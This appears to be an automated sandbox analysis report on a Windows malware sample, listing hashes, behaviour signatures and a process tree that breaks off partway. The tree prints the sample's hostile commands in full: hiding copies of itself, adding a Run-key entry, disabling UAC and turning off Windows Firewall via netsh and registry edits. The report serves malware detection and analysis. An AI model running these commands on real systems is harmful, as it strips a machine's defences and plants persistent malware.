Analysis
-
max time kernel
149s -
max time network
143s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
-
submitted
13/09/2024, 12:32
General
-
Target
de4d5653904e71f077a0ce02a6ae0897_JaffaCakes118.exe
-
Size
409KB
-
MD5
de4d5653904e71f077a0ce02a6ae0897
-
SHA1
d1c4ae2a6cfd13d20a7264b80e080c9e885058d8
-
SHA256
25e63c5766c468eb3d682b888c8540c87c94ab85fa36507c268dbf089acd1314
-
SHA512
3cbd8fc886c2ab6d7bcfe4b8d2502b409e05a80b65acf5d8e00e739f9c59d8894b3d3cc44c3d563cd136a33f3d7a35122c6d2127825002811a2b6f496d4b4d75
-
SSDEEP
6144:+H2Oh5XR6qTRUHwFxL7GxMN3C/JJ1xXj3AjlvVg5n/oGH0HGJezZya9v4zqC:Jk5XR6qtUQFxLixOC/bj3QWnJUszqC
Score
10/10
Malware Config
Signatures
-
Modifies firewall policy service 3 TTPs 4 IoCs
-
UAC bypass 3 TTPs 2 IoCs
-
Modifies Windows Firewall 2 TTPs 4 IoCs
-
Sets file to hidden 1 TTPs 12 IoCs
Modifies file attributes to stop it showing in Explorer etc.
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
-
Executes dropped EXE 2 IoCs
-
Loads dropped DLL 1 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 3 IoCs
-
Drops desktop.ini file(s) 7 IoCs
-
Enumerates connected drives 3 TTPs 46 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
-
Drops autorun.inf file 1 TTPs 5 IoCs
Malware can abuse Windows Autorun to spread further via attached volumes.
-
Drops file in System32 directory 5 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 58 IoCs
-
Drops file in Windows directory 2 IoCs
-
Launches sc.exe 6 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 12 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
-
Program crash 2 IoCs
-
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
Modifies Control Panel 2 IoCs
-
Modifies Internet Explorer settings 1 TTPs 24 IoCs
-
Modifies registry class 2 IoCs
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious use of AdjustPrivilegeToken 10 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Views/modifies file attributes 1 TTPs 22 IoCs
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\winspace.scrC:\Users\Admin\AppData\Roaming\Microsoft\Windows\winspace.scr /s2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c attrib -R -H -S "%appdata%\directplay.exe"3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib -R -H -S "C:\Users\Admin\AppData\Roaming\directplay.exe"4⤵
- Views/modifies file attributes
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\winspace.scr" "%appdata%\directplay.exe"3⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c attrib +R +H +S "%appdata%\directplay.exe"3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\attrib.exeattrib +R +H +S "C:\Users\Admin\AppData\Roaming\directplay.exe"4⤵
- Sets file to hidden
- Views/modifies file attributes
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg ADD "HKCU\software\microsoft\windows\currentversion\run" /v "directplay" /t REG_SZ /d "%appdata%\directplay.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exereg ADD "HKCU\software\microsoft\windows\currentversion\run" /v "directplay" /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\directplay.exe" /f4⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c attrib -R -H -S "%windir%\system32\sysclock.exe"3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib -R -H -S "C:\Windows\system32\sysclock.exe"4⤵
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\winspace.scr" "%windir%\system32\sysclock.exe"3⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c attrib +R +H +S "%windir%\system32\sysclock.exe"3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\attrib.exeattrib +R +H +S "C:\Windows\system32\sysclock.exe"4⤵
- Sets file to hidden
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c md %appdata%\Microsoft\Windows3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c attrib -R -H -S "%appdata%\Microsoft\Windows\winspace.scr"3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\attrib.exeattrib -R -H -S "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\winspace.scr"4⤵
- Views/modifies file attributes
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\winspace.scr" "%appdata%\Microsoft\Windows\winspace.scr"3⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c attrib +R +H +S "%appdata%\Microsoft\Windows\winspace.scr"3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +R +H +S "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\winspace.scr"4⤵
- Sets file to hidden
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg ADD "HKCU\Control Panel\Desktop" /v "SCRNSAVE.EXE" /t REG_SZ /d "%appdata%\Microsoft\Windows\winspace.scr" /f3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\reg.exereg ADD "HKCU\Control Panel\Desktop" /v "SCRNSAVE.EXE" /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\winspace.scr" /f4⤵
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg ADD "HKCU\Control Panel\Desktop" /v ScreenSaveActive /t REG_SZ /d "1" /f3⤵
-
C:\Windows\SysWOW64\reg.exereg ADD "HKCU\Control Panel\Desktop" /v ScreenSaveActive /t REG_SZ /d "1" /f4⤵
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg ADD "HKCU\Control Panel\Desktop" /v ScreenSaveTimeOut /t REG_SZ /d "60" /f3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\reg.exereg ADD "HKCU\Control Panel\Desktop" /v ScreenSaveTimeOut /t REG_SZ /d "60" /f4⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c NET START seclogon3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net.exeNET START seclogon4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 START seclogon5⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c rd /s /q "%appdata%\Macromedia\Flash Player\#SharedObjects"3⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v EnableBalloonTips /t REG_DWORD /d 0 /f3⤵
-
C:\Windows\SysWOW64\reg.exereg ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v EnableBalloonTips /t REG_DWORD /d 0 /f4⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg DELETE "HKCU\software\microsoft\windows\currentversion\action center\checks" /f3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\reg.exereg DELETE "HKCU\software\microsoft\windows\currentversion\action center\checks" /f4⤵
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f3⤵
-
C:\Windows\SysWOW64\reg.exereg ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f4⤵
- UAC bypass
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c sc config upnphost start= auto3⤵
-
C:\Windows\SysWOW64\sc.exesc config upnphost start= auto4⤵
- Launches sc.exe
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c sc config SSDPSRV start= auto3⤵
-
C:\Windows\SysWOW64\sc.exesc config SSDPSRV start= auto4⤵
- Launches sc.exe
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c sc config browser start= auto3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\sc.exesc config browser start= auto4⤵
- Launches sc.exe
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c net start upnphost3⤵
-
C:\Windows\SysWOW64\net.exenet start upnphost4⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start upnphost5⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c net start SSDPSRV3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net.exenet start SSDPSRV4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start SSDPSRV5⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c net start browser3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net.exenet start browser4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start browser5⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c netsh advfirewall set currentprofile state off3⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall set currentprofile state off4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg ADD "HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile" /v EnableFirewall /t REG_DWORD /d 0 /f3⤵
-
C:\Windows\SysWOW64\reg.exereg ADD "HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile" /v EnableFirewall /t REG_DWORD /d 0 /f4⤵
- Modifies firewall policy service
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg ADD "HKLM\SOFTWARE\Policies\Microsoft\WindowsFirewall\StandardProfile" /v EnableFirewall /t REG_DWORD /d 0 /f3⤵
-
C:\Windows\SysWOW64\reg.exereg ADD "HKLM\SOFTWARE\Policies\Microsoft\WindowsFirewall\StandardProfile" /v EnableFirewall /t REG_DWORD /d 0 /f4⤵
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg ADD "HKLM\SOFTWARE\Policies\Microsoft\WindowsFirewall\DomainProfile" /v EnableFirewall /t REG_DWORD /d 0 /f3⤵
-
C:\Windows\SysWOW64\reg.exereg ADD "HKLM\SOFTWARE\Policies\Microsoft\WindowsFirewall\DomainProfile" /v EnableFirewall /t REG_DWORD /d 0 /f4⤵
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c netsh advfirewall set currentprofile state off3⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall set currentprofile state off4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg ADD "HKLM\Software\Microsoft\Internet Explorer\Main\FeatureControl" /v FEATURE_WEBOC_POPUPMANAGEMENT /t REG_DWORD /d 0 /f3⤵
-
C:\Windows\SysWOW64\reg.exereg ADD "HKLM\Software\Microsoft\Internet Explorer\Main\FeatureControl" /v FEATURE_WEBOC_POPUPMANAGEMENT /t REG_DWORD /d 0 /f4⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg ADD "HKLM\Software\Microsoft\Internet Explorer\Main" /v Show_FullURL /t REG_SZ /d yes /f3⤵
-
C:\Windows\SysWOW64\reg.exereg ADD "HKLM\Software\Microsoft\Internet Explorer\Main" /v Show_FullURL /t REG_SZ /d yes /f4⤵
- Modifies Internet Explorer settings
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg ADD "HKLM\Software\Microsoft\Internet Explorer\Main" /v Show_StatusBar /t REG_SZ /d yes /f3⤵
-
C:\Windows\SysWOW64\reg.exereg ADD "HKLM\Software\Microsoft\Internet Explorer\Main" /v Show_StatusBar /t REG_SZ /d yes /f4⤵
- Modifies Internet Explorer settings
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg ADD "HKLM\Software\Microsoft\Internet Explorer\Main" /v Show_URLinStatusBar /t REG_SZ /d yes /f3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\reg.exereg ADD "HKLM\Software\Microsoft\Internet Explorer\Main" /v Show_URLinStatusBar /t REG_SZ /d yes /f4⤵
- Modifies Internet Explorer settings
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg ADD "HKLM\Software\Microsoft\Internet Explorer\MINIE" /v ShowStatusBar /t REG_DWORD /d 1 /f3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\reg.exereg ADD "HKLM\Software\Microsoft\Internet Explorer\MINIE" /v ShowStatusBar /t REG_DWORD /d 1 /f4⤵
- Modifies Internet Explorer settings
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg DELETE "HKCU\AppEvents\Schemes\Apps\Explorer\Navigating\.Current" /f3⤵
-
C:\Windows\SysWOW64\reg.exereg DELETE "HKCU\AppEvents\Schemes\Apps\Explorer\Navigating\.Current" /f4⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg DELETE "HKCU\AppEvents\Schemes\Apps\Explorer\Navigating\.Default" /f3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\reg.exereg DELETE "HKCU\AppEvents\Schemes\Apps\Explorer\Navigating\.Default" /f4⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg ADD "HKCU\Software\Microsoft\Internet Explorer\Main" /v Check_Associations /t REG_SZ /d no /f3⤵
-
C:\Windows\SysWOW64\reg.exereg ADD "HKCU\Software\Microsoft\Internet Explorer\Main" /v Check_Associations /t REG_SZ /d no /f4⤵
- Modifies Internet Explorer settings
-
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Program Files (x86)\Windows Media Player\wmplayer.exe"C:\Program Files (x86)\Windows Media Player\wmplayer.exe"3⤵
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p1⤵
-
C:\Users\Admin\AppData\Local\Temp\de4d5653904e71f077a0ce02a6ae0897_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\de4d5653904e71f077a0ce02a6ae0897_JaffaCakes118.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\4640.29905"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\4640.29905C:\Users\Admin\AppData\Roaming\4640.299053⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Modifies Control Panel
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c attrib -R -H -S "%appdata%\directplay.exe"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\attrib.exeattrib -R -H -S "C:\Users\Admin\AppData\Roaming\directplay.exe"5⤵
- Views/modifies file attributes
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Roaming\4640.29905" "%appdata%\directplay.exe"4⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c attrib +R +H +S "%appdata%\directplay.exe"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\attrib.exeattrib +R +H +S "C:\Users\Admin\AppData\Roaming\directplay.exe"5⤵
- Sets file to hidden
- Views/modifies file attributes
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg ADD "HKCU\software\microsoft\windows\currentversion\run" /v "directplay" /t REG_SZ /d "%appdata%\directplay.exe" /f4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\reg.exereg ADD "HKCU\software\microsoft\windows\currentversion\run" /v "directplay" /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\directplay.exe" /f5⤵
- Adds Run key to start application
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c attrib -R -H -S "%windir%\system32\sysclock.exe"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\attrib.exeattrib -R -H -S "C:\Windows\system32\sysclock.exe"5⤵
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Roaming\4640.29905" "%windir%\system32\sysclock.exe"4⤵
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c attrib +R +H +S "%windir%\system32\sysclock.exe"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\attrib.exeattrib +R +H +S "C:\Windows\system32\sysclock.exe"5⤵
- Sets file to hidden
- Drops file in System32 directory
- Views/modifies file attributes
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c md %appdata%\Microsoft\Windows4⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c attrib -R -H -S "%appdata%\Microsoft\Windows\winspace.scr"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\attrib.exeattrib -R -H -S "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\winspace.scr"5⤵
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Roaming\4640.29905" "%appdata%\Microsoft\Windows\winspace.scr"4⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c attrib +R +H +S "%appdata%\Microsoft\Windows\winspace.scr"4⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +R +H +S "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\winspace.scr"5⤵
- Sets file to hidden
- Views/modifies file attributes
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg ADD "HKCU\Control Panel\Desktop" /v "SCRNSAVE.EXE" /t REG_SZ /d "%appdata%\Microsoft\Windows\winspace.scr" /f4⤵
-
C:\Windows\SysWOW64\reg.exereg ADD "HKCU\Control Panel\Desktop" /v "SCRNSAVE.EXE" /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\winspace.scr" /f5⤵
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg ADD "HKCU\Control Panel\Desktop" /v ScreenSaveActive /t REG_SZ /d "1" /f4⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\reg.exereg ADD "HKCU\Control Panel\Desktop" /v ScreenSaveActive /t REG_SZ /d "1" /f5⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg ADD "HKCU\Control Panel\Desktop" /v ScreenSaveTimeOut /t REG_SZ /d "60" /f4⤵
-
C:\Windows\SysWOW64\reg.exereg ADD "HKCU\Control Panel\Desktop" /v ScreenSaveTimeOut /t REG_SZ /d "60" /f5⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c NET START seclogon4⤵
-
C:\Windows\SysWOW64\net.exeNET START seclogon5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 START seclogon6⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c rd /s /q "%appdata%\Macromedia\Flash Player\#SharedObjects"4⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v EnableBalloonTips /t REG_DWORD /d 0 /f4⤵
-
C:\Windows\SysWOW64\reg.exereg ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v EnableBalloonTips /t REG_DWORD /d 0 /f5⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg DELETE "HKCU\software\microsoft\windows\currentversion\action center\checks" /f4⤵
-
C:\Windows\SysWOW64\reg.exereg DELETE "HKCU\software\microsoft\windows\currentversion\action center\checks" /f5⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f4⤵
-
C:\Windows\SysWOW64\reg.exereg ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f5⤵
- UAC bypass
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c sc config upnphost start= auto4⤵
-
C:\Windows\SysWOW64\sc.exesc config upnphost start= auto5⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c sc config SSDPSRV start= auto4⤵
-
C:\Windows\SysWOW64\sc.exesc config SSDPSRV start= auto5⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c sc config browser start= auto4⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\sc.exesc config browser start= auto5⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c net start upnphost4⤵
-
C:\Windows\SysWOW64\net.exenet start upnphost5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start upnphost6⤵
- System Location Discovery: System Language Discovery
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c net start SSDPSRV4⤵
-
C:\Windows\SysWOW64\net.exenet start SSDPSRV5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start SSDPSRV6⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c net start browser4⤵
-
C:\Windows\SysWOW64\net.exenet start browser5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start browser6⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c netsh advfirewall set currentprofile state off4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall set currentprofile state off5⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg ADD "HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile" /v EnableFirewall /t REG_DWORD /d 0 /f4⤵
-
C:\Windows\SysWOW64\reg.exereg ADD "HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile" /v EnableFirewall /t REG_DWORD /d 0 /f5⤵
- Modifies firewall policy service
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg ADD "HKLM\SOFTWARE\Policies\Microsoft\WindowsFirewall\StandardProfile" /v EnableFirewall /t REG_DWORD /d 0 /f4⤵
-
C:\Windows\SysWOW64\reg.exereg ADD "HKLM\SOFTWARE\Policies\Microsoft\WindowsFirewall\StandardProfile" /v EnableFirewall /t REG_DWORD /d 0 /f5⤵
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg ADD "HKLM\SOFTWARE\Policies\Microsoft\WindowsFirewall\DomainProfile" /v EnableFirewall /t REG_DWORD /d 0 /f4⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\reg.exereg ADD "HKLM\SOFTWARE\Policies\Microsoft\WindowsFirewall\DomainProfile" /v EnableFirewall /t REG_DWORD /d 0 /f5⤵
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c netsh advfirewall set currentprofile state off4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall set currentprofile state off5⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg ADD "HKLM\Software\Microsoft\Internet Explorer\Main\FeatureControl" /v FEATURE_WEBOC_POPUPMANAGEMENT /t REG_DWORD /d 0 /f4⤵
-
C:\Windows\SysWOW64\reg.exereg ADD "HKLM\Software\Microsoft\Internet Explorer\Main\FeatureControl" /v FEATURE_WEBOC_POPUPMANAGEMENT /t REG_DWORD /d 0 /f5⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg ADD "HKLM\Software\Microsoft\Internet Explorer\Main" /v Show_FullURL /t REG_SZ /d yes /f4⤵
-
C:\Windows\SysWOW64\reg.exereg ADD "HKLM\Software\Microsoft\Internet Explorer\Main" /v Show_FullURL /t REG_SZ /d yes /f5⤵
- Modifies Internet Explorer settings
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg ADD "HKLM\Software\Microsoft\Internet Explorer\Main" /v Show_StatusBar /t REG_SZ /d yes /f4⤵
-
C:\Windows\SysWOW64\reg.exereg ADD "HKLM\Software\Microsoft\Internet Explorer\Main" /v Show_StatusBar /t REG_SZ /d yes /f5⤵
- Modifies Internet Explorer settings
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg ADD "HKLM\Software\Microsoft\Internet Explorer\Main" /v Show_URLinStatusBar /t REG_SZ /d yes /f4⤵
-
C:\Windows\SysWOW64\reg.exereg ADD "HKLM\Software\Microsoft\Internet Explorer\Main" /v Show_URLinStatusBar /t REG_SZ /d yes /f5⤵
- Modifies Internet Explorer settings
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg ADD "HKLM\Software\Microsoft\Internet Explorer\MINIE" /v ShowStatusBar /t REG_DWORD /d 1 /f4⤵
-
